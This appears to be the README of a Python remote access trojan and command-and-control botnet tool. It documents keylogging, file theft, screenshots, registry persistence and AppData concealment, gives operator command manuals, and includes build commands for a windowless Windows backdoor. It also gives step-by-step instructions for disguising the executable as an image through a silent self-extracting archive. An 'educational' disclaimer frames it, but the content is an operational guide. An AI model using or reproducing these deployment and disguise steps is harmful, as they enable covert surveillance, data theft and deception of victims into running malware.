PythonRAT

The MALWARE PythonRAT is for EDUCATIONAL PURPOSES ONLY!!

Description

PythonRAT is a Command and Control (C2) server which can control multiple machines running the Remote Administration Trojan (RAT) forming a botnet cluster which was written in Python3.

Features

Integrated keylogger written as a class
- Can be started and stopped remotely
- With options to dump or overwrite the log file
Check privilege level (Administrator/User)
Spawn other programs
Download files from target
Download files from specified URL
Upload files to target
C2 allows control of multiple target sessions
Issue a sendall command to every active session
Persistence by creating a registry entry (Windows)
Conceals infection by writing files in AppData (Windows)
Screenshot of the target's screen which is sent to server
Remote shutdown of the backdoor (executable is NOT safely removed)

Usage Manuals
- C2 Manual
- Session Manual
Wine and Pyinstaller (Win version) Installation on Linux
- Environment Setup
- Installing Dependencies
Backdoor Compilation and Obfuscation for Windows
Preview Images

Usage Manuals

C2 Manual

targets                 --> Prints Active Sessions
session *session num*   --> Will Connect To Session (background to return)
clear                   --> Clear Terminal Screen
exit                    --> Quit ALL Active Sessions and Closes C2 Server!!
kill *session num*      --> Issue 'quit' To Specified Target Session
sendall *command*       --> Sends The *command* To ALL Active Sessions (sendall notepad)

Session Manual

quit                                --> Quit Session With The Target
clear                               --> Clear The Screen
background                          --> Send Session With Target To Background
cd *Directory name*                 --> Changes Directory On Target System
upload *file name*                  --> Upload File To The Target Machine From Working Dir 
download *file name*                --> Download File From Target Machine
get *url*                           --> Download File From Specified URL to Target ./
keylog_start                        --> Start The Keylogger
keylog_dump                         --> Print Keystrokes That The Target From taskmanager.txt
keylog_stop                         --> Stop And Self Destruct Keylogger File
screenshot                          --> Takes screenshot and sends to server ./screenshots/
start *programName*                 --> Spawn Program Using backdoor e.g. 'start notepad'
remove_backdoor                     --> Removes backdoor from target!!!

===Windows Only===
persistence *RegName* *filename*    --> Create Persistence In Registry
                                        copies backdoor to ~/AppData/Roaming/filename
                                        example: persistence Backdoor windows32.exe
check                               --> Check If Has Administrator Privileges

Wine and Pyinstaller (Win version) Installation on Linux

Python 2.7.14 Releases: https://www.python.org/downloads/release/python-2714/

Environment Setup

┌──(root💀kali)-[~/]

└─# sudo su

dpkg --add-architecture i386
apt update
apt install wine32 
wget https://www.python.org/ftp/python/2.7.14/python-2.7.14.msi
sudo wine msiexec -i ~/python-2.7.14.msi #x86 arch

Installing Dependencies

┌──(root💀kali)-[~]

└─#

cd /root/.wine/drive_c/Python27
wine python.exe -m pip install  pyinstaller
                                requests
                                pyautogui
			    pynput

Backdoor Compilation and Obfuscation for Windows

Compile to Executable using Pyinstaller Linux

$ pyinstaller --onefile --noconsole backdoor.py

or,

Compile to Executable using Pyinstaller (Win) under Wine

┌──(root💀kali)-[~]

└─#

wine /root/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile --noconsole ~/backdoor.py

alternatively if an icon has already been created,

wine /root/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile --noconsole --icon ~/malware_128x128.ico ~/backdoor.py

This will produce ./dist/backdoor.exe

Obfuscation using SFX Archive (Theory)

The executable backdoor.exe will be made to look like an image (jpg) file. By default, Windows does not show file extensions (e.g. backdoor.exe will show in Windows Explorer as backdoor). Hence, we will create an SFX archive name wallpaper.jpg.exe which Windows Explorer will show as wallpaper.jpg.

This will involve having an image which we will also create an icon version of .ico to assign the SFX archive. Making the executable appear to be an image.

Of course, this same method could be applied to audio, document or video file using an appropriate icon.

NOTE: SFX Archive

SFX archive is not the only method of obfuscating the executable. We can when compiling using Pyinstaller add the argument --add-data "/root/wallpaper.jpg;." with --icon ~/wallpaper.ico.

┌──(root💀kali)-[~]

└─#

wine /root/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile --noconsole --add-data "/root/wallpaper.jpg;." --icon ~/malware_128x128.ico ~/backdoor.py
mv ./dist/_backdoor.exe_ ./dist/_wallpaper.jpg.exe_

Creating SFX Archive

WinRAR > Add To Archive (image.jpg and backdoor.exe)

Rename archive to: image.jpg.exe

-Add to SFX Archive (Y) and Advanced>

**Setup>Run after extraction**

	California-HD-Background.jpg
	backdoor.exe

**Modes**
	Unpack to temporary folder
	Silent mode
		Hide all

**Update**
	Update mode>
		Extract and update files
	Overwrite mode>
		Overwrite all files
		
**Text and icon**
	Load SFX icon from the file (image ICO)

Creating SFX Archive - Visual

Create_SFXArchive_Instructions.gif.mp4

This will produce an SFX archive which looks like an image

While inspecting the file will reveal it is an executable the file extension .exe is concealed. Furthermore, if viewed from the Desktop the file cannot be differentiated from a 'real' image.